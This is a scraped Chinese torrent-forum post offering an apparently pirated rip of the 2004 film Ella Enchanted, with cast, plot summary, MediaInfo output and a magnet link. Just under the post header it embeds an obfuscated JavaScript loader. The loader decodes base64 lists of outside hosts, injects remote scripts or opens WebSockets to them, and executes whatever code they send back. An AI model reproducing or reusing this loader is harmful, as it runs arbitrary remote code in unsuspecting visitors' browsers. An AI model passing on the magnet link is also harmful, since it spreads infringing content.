魔法灰姑娘[中文字幕].Ella.Enchanted.2004.1080p.BluRay.x265.10bit 5.84GB

版主小s 1月前 201

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 魔法灰姑娘 / 麻辣公主
◎片  名 Ella Enchanted
◎年  代 2004
◎产  地 美国 / 爱尔兰 / 英国
◎类  别 喜剧 / 爱情 / 家庭 / 奇幻
◎语  言 英语
◎上映日期 2004-04-09
◎IMDb链接 https://www.imdb.com/title/tt0327679/
◎豆瓣评分 6.6/10 (53281人评价)
◎豆瓣链接 https://movie.douban.com/subject/1304038/
◎片  长 96 分钟
◎导  演 汤米·奥·哈沃 Tommy O'Haver (id:1041568)
◎编  剧 Jennifer Heath Jennifer Heath (id:1286317)
◎演  员 安妮·海瑟薇 Anne Hathaway (id:1048027)
       休·丹西 Hugh Dancy (id:1017931)
       加利·艾尔维斯 Cary Elwes (id:1040521)
       乔安娜·林莉 Joanna Lumley (id:1048173)
       丹尼尔·纳普勒斯 Daniel Naprous (id:1395103)
       Emmet Kirwan Emmet Kirwan (id:1394192)
       艾米莉亚·克劳利 Amelia Crowley (id:1387282)
       罗里·基南 Rory Keenan (id:1339742)
       帕敏德·纳格拉 Parminder Nagra (id:1027232)
       阮明智 Johnny Nguyen (id:1305076)
       艾丹·麦克阿德尔 Aidan McArdle (id:1326778)
       Su Armstrong Su Armstrong (id:1277417)
       鲍伯·韦恩斯坦 Bob Weinstein (id:1300654)
       詹姆斯·弗林 James Flynn (id:1283891)
       John de Borman John de Borman (id:1281984)
       诺尔曼·加尔伍德 Norman Garwood (id:1284595)
       马修·格雷 Matthew Gray (id:1285335)
       Anna Rackard Anna Rackard (id:1295117)
       露丝·迈尔斯 Ruth Myers (id:1292826)
       尼尔·斯坎伦 Neal Scanlan (id:1296808)
       Sallie Jaye Sallie Jaye (id:1287636)
       Eileen Buggy Eileen Buggy (id:1279596)
       Dee Corcoran Dee Corcoran (id:1281265)
       保罗·詹宁斯 Paul Jennings (id:1287680)
       Karen Richards Karen Richards (id:1295587)
       Pieter Warmington Pieter Warmington (id:1308986)
       查里·亨利 Charley Henley (id:1286430)
       Robin Huffer Robin Huffer (id:1287098)
       尼尔·斯坎伦 Neal Scanlan (id:1296808)
       Jonathan Neill Jonathan Neill (id:1293014)
       Joe Pavlo Joe Pavlo (id:1294139)
       苏·罗 Sue Rowe (id:1296234)
       Alex Smith Alex Smith (id:1297846)
       Nigel Stone Nigel Stone (id:1298505)
       Victor Wade Victor Wade (id:1302191)
       Ben Thompson Ben Thompson (id:1303137)
       ?sa Svedberg ?sa Svedberg (id:1306042)
       Ken Dailey Ken Dailey (id:1281726)
       Laurent Cordier Laurent Cordier (id:1281281)
       彼特·贝布 Pete Bebb (id:1278170)
       Barrie Hemsley Barrie Hemsley (id:1276250)
       Angus Bickerton Angus Bickerton (id:1276351)
       Kevin Ahern Kevin Ahern (id:1276871)
       安吉拉·巴松 Angela Barson (id:1278010)

◎标  签 AnneHathaway / 美国 / 魔幻 / 童话 / 喜剧 / 爱情 / 美国电影 / 魔法灰姑娘

◎简  介
  艾拉(安妮?海瑟薇 饰)出生与一个色彩斑斓的奇幻世界中,每个在这里出生的孩子都会得到仙女的“礼物”。而可爱的艾拉得到的“礼物”是服从。自此,无论是多苛刻的要求,只要一声命令,艾拉便会一一照办。艾拉母亲去世前便叮嘱她以后要用自己内心的真实信念去抗行咒语,而且必须找到下咒语的魔女才能完全解除咒语。此时的艾拉已经饱受继母及继母女儿的折磨,而她告诉自己必须要找到当年的魔女。                                    
                                但一切进行得并不顺利,而在一个偶然的机会中,她认识了英俊的王子查尔。自小父母便离世的查尔十分听从叔叔的话。艾拉跟王子很快便坠入了爱河,当回到城堡的时候,艾拉发现了查尔叔叔的秘密,而且她身上的咒语更受到了查尔叔叔的利用……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 29278362639848511532727266896545814219 (0x1606CEBA7CC39279D7FE8AC9C6B396CB)

  4. Complete name                            : Ella.Enchanted.2004.1080p.BluRay.x265.10bit-BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 5.84 GiB

  8. Duration                                 : 1 h 36 min

  9. Overall bit rate                         : 8 666 kb/s

  10. Movie name                               : Ella Enchanted 2004 1080p BluRay x265 10bit MNHD

  11. Encoded date                             : UTC 2021-09-01 02:05:31

  12. Writing application                      : mkvmerge v53.0.0 ('Fool's Gold') 64-bit

  13. Writing library                          : libebml v1.4.1 + libmatroska v1.6.2


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@High

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 36 min

  21. Bit rate                                 : 8 024 kb/s

  22. Width                                    : 1 914 pixels

  23. Height                                   : 1 040 pixels

  24. Display aspect ratio                     : 1.85:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 24.000 FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.168

  31. Stream size                              : 5.41 GiB (93%)

  32. Writing library                          : x265 3.5+1-f0c1022b6:[Linux][GCC 9.3.0][64 bit] 10bit

  33. Encoding settings                        : cpuid=533541111039 / frame-threads=3 / numa-pools=11 / wpp / pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1914x1040 / interlace=0 / total-frames=138906 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=1 / keyint=250 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=80 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=5 / limit-refs=0 / no-limit-modes / me=3 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.50 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=-2 / crqpoffs=-2 / rc=crf / crf=22.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=1 / aq-strength=1.00 / no-cutree / zone-count=0 / no-strict-cbr / qg-size=8 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Default                                  : Yes

  35. Forced                                   : No

  36. Color range                              : Limited

  37. Color primaries                          : BT.709

  38. Transfer characteristics                 : BT.709

  39. Matrix coefficients                      : BT.709


  40. Audio

  41. ID                                       : 2

  42. Format                                   : AC-3

  43. Format/Info                              : Audio Coding 3

  44. Commercial name                          : Dolby Digital

  45. Codec ID                                 : A_AC3

  46. Duration                                 : 1 h 36 min

  47. Bit rate mode                            : Constant

  48. Bit rate                                 : 640 kb/s

  49. Channel(s)                               : 6 channels

  50. Channel layout                           : L R C LFE Ls Rs

  51. Sampling rate                            : 48.0 kHz

  52. Frame rate                               : 31.250 FPS (1536 SPF)

  53. Compression mode                         : Lossy

  54. Stream size                              : 441 MiB (7%)

  55. Language                                 : English

  56. Service kind                             : Complete Main

  57. Default                                  : Yes

  58. Forced                                   : No


  59. Text #1

  60. ID                                       : 3

  61. Format                                   : ASS

  62. Codec ID                                 : S_TEXT/ASS

  63. Codec ID/Info                            : Advanced Sub Station Alpha

  64. Duration                                 : 1 h 35 min

  65. Bit rate                                 : 183 b/s

  66. Count of elements                        : 1270

  67. Compression mode                         : Lossless

  68. Stream size                              : 128 KiB (0%)

  69. Title                                    : ChsEng

  70. Language                                 : Chinese

  71. Default                                  : Yes

  72. Forced                                   : No


  73. Text #2

  74. ID                                       : 4

  75. Format                                   : UTF-8

  76. Codec ID                                 : S_TEXT/UTF8

  77. Codec ID/Info                            : UTF-8 Plain Text

  78. Duration                                 : 1 h 35 min

  79. Bit rate                                 : 133 b/s

  80. Count of elements                        : 1270

  81. Stream size                              : 93.8 KiB (0%)

  82. Title                                    : ChsEng

  83. Language                                 : Chinese

  84. Default                                  : No

  85. Forced                                   : No


  86. Text #3

  87. ID                                       : 5

  88. Format                                   : UTF-8

  89. Codec ID                                 : S_TEXT/UTF8

  90. Codec ID/Info                            : UTF-8 Plain Text

  91. Duration                                 : 1 h 35 min

  92. Bit rate                                 : 62 b/s

  93. Count of elements                        : 1270

  94. Stream size                              : 43.9 KiB (0%)

  95. Title                                    : Chs

  96. Language                                 : Chinese

  97. Default                                  : No

  98. Forced                                   : No


  99. Text #4

  100. ID                                       : 6

  101. Format                                   : UTF-8

  102. Codec ID                                 : S_TEXT/UTF8

  103. Codec ID/Info                            : UTF-8 Plain Text

  104. Duration                                 : 1 h 35 min

  105. Bit rate                                 : 67 b/s

  106. Count of elements                        : 1267

  107. Stream size                              : 47.4 KiB (0%)

  108. Title                                    : Eng

  109. Language                                 : Chinese

  110. Default                                  : No

  111. Forced                                   : No


  112. Menu

  113. 00:00:00.000                             : en:Chapter 01

  114. 00:07:35.000                             : en:Chapter 02

  115. 00:13:09.458                             : en:Chapter 03

  116. 00:20:22.292                             : en:Chapter 04

  117. 00:24:03.542                             : en:Chapter 05

  118. 00:27:54.750                             : en:Chapter 06

  119. 00:33:16.042                             : en:Chapter 07

  120. 00:40:21.375                             : en:Chapter 08

  121. 00:43:36.417                             : en:Chapter 09

  122. 00:47:20.958                             : en:Chapter 10

  123. 00:55:24.833                             : en:Chapter 11

  124. 01:02:04.667                             : en:Chapter 12

  125. 01:08:08.042                             : en:Chapter 13

  126. 01:13:13.583                             : en:Chapter 14

  127. 01:20:51.875                             : en:Chapter 15



TAGS 奇幻 喜剧 爱情 家庭

磁力链:
  • magnet:?xt=urn:btih:515E6F06497BF4CF0E033DD847A24740F13F41B3
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回